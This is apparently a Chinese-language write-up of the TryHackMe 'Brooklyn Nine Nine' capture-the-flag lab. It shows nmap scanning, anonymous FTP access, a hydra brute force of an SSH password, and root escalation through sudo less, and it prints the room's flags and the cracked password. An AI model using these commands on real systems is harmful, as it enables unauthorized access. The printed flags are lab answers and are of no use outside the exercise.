服务发现

┌──(rootkali)-[~/tryhackme]└─# nmap -sV -Pn 10.10.60.116                      Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-24 05:20 EDTNmap scan report for 10.10.60.116Host is up (0.34s latency).Not shown: 997 closed portsPORT   STATE SERVICE VERSION21/tcp open  ftp     vsftpd 3.0.322/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 20.79 seconds

匿名登录FTP服务

┌──(rootkali)-[~/tryhackme/brooklyn]└─# ftp 10.10.60.116   Connected to 10.10.60.116.220 (vsFTPd 3.0.3)Name (10.10.60.116:root): anonymous331 Please specify the password.Password:230 Login successful.Remote system type is UNIX.Using binary mode to transfer files.ftp> ls200 PORT command successful. Consider using PASV.150 Here comes the directory listing.-rw-r--r--    1 0        0             119 May 17  2020 note_to_jake.txt226 Directory send OK.ftp> get note_to_jake.txtlocal: note_to_jake.txt remote: note_to_jake.txt200 PORT command successful. Consider using PASV.150 Opening BINARY mode data connection for note_to_jake.txt (119 bytes).226 Transfer complete.119 bytes received in 0.06 secs (1.9443 kB/s)

下载了一个note_to_jake.txt文件

查看文件

┌──(rootkali)-[~/tryhackme/brooklyn]└─# cat note_to_jake.txt From Amy,Jake please change your password. It is too weak and holt will be mad if someone hacks into the nine nine

几乎是邀请咱们破解他的ssh明码，hydra破解之

┌──(rootkali)-[~/tryhackme/brooklyn]└─# hydra -l jake -P /usr/share/wordlists/rockyou.txt 10.10.60.116 ssh -t 20 -v                                                                                                                                                       130 ⨯Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-09-24 05:26:34[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore[DATA] max 20 tasks per 1 server, overall 20 tasks, 14344399 login tries (l:1/p:14344399), ~717220 tries per task[DATA] attacking ssh://10.10.60.116:22/[VERBOSE] Resolving addresses ... [VERBOSE] resolving done[INFO] Testing if password authentication is supported by ssh://jake@10.10.60.116:22[INFO] Successful, password authentication is supported by ssh://10.10.60.116:22[ERROR] could not connect to target port 22: Socket error: Connection reset by peer[ERROR] could not connect to target port 22: Socket error: Connection reset by peer[ERROR] ssh protocol error[ERROR] ssh protocol error[ERROR] could not connect to target port 22: Socket error: Connection reset by peer[ERROR] ssh protocol error[ERROR] could not connect to target port 22: Socket error: Connection reset by peer[ERROR] ssh protocol error[22][ssh] host: 10.10.60.116   login: jake   password: 987654321[STATUS] attack finished for 10.10.60.116 (waiting for children to complete tests)

爆出明码jake:987654321

在/home/holt目录找到user.txt

┌──(rootkali)-[~/tryhackme/brooklyn]└─# ssh jake@10.10.60.116               The authenticity of host '10.10.60.116 (10.10.60.116)' can't be established.ECDSA key fingerprint is SHA256:Ofp49Dp4VBPb3v/vGM9jYfTRiwpg2v28x1uGhvoJ7K4.Are you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added '10.10.60.116' (ECDSA) to the list of known hosts.jake@10.10.60.116's password: Last login: Tue May 26 08:56:58 2020jake@brookly_nine_nine:~$ lsjake@brookly_nine_nine:~$ whoamijakejake@brookly_nine_nine:~$ pwd/home/jakejake@brookly_nine_nine:~$ cd ..jake@brookly_nine_nine:/home$ lsamy  holt  jakejake@brookly_nine_nine:/home$ cd amyjake@brookly_nine_nine:/home/amy$ lsjake@brookly_nine_nine:/home/amy$ cd ../holt/jake@brookly_nine_nine:/home/holt$ lsnano.save  user.txtjake@brookly_nine_nine:/home/holt$ cat user.txtee11cbb19052e40b07aac0ca060c23ee

sudo -l查看超级权限,能够应用less

jake@brookly_nine_nine:/home/holt$ sudo -lMatching Defaults entries for jake on brookly_nine_nine:    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser jake may run the following commands on brookly_nine_nine:    (ALL) NOPASSWD: /usr/bin/less

提权到root

jake@brookly_nine_nine:/home/holt$ sudo less /etc/profile# iduid=0(root) gid=0(root) groups=0(root)# cat /root/root.txt-- Creator : Fsociety2006 --Congratulations in rooting Brooklyn Nine NineHere is the flag: 63a9f0ea7bb98050796b649e85481845Enjoy!!#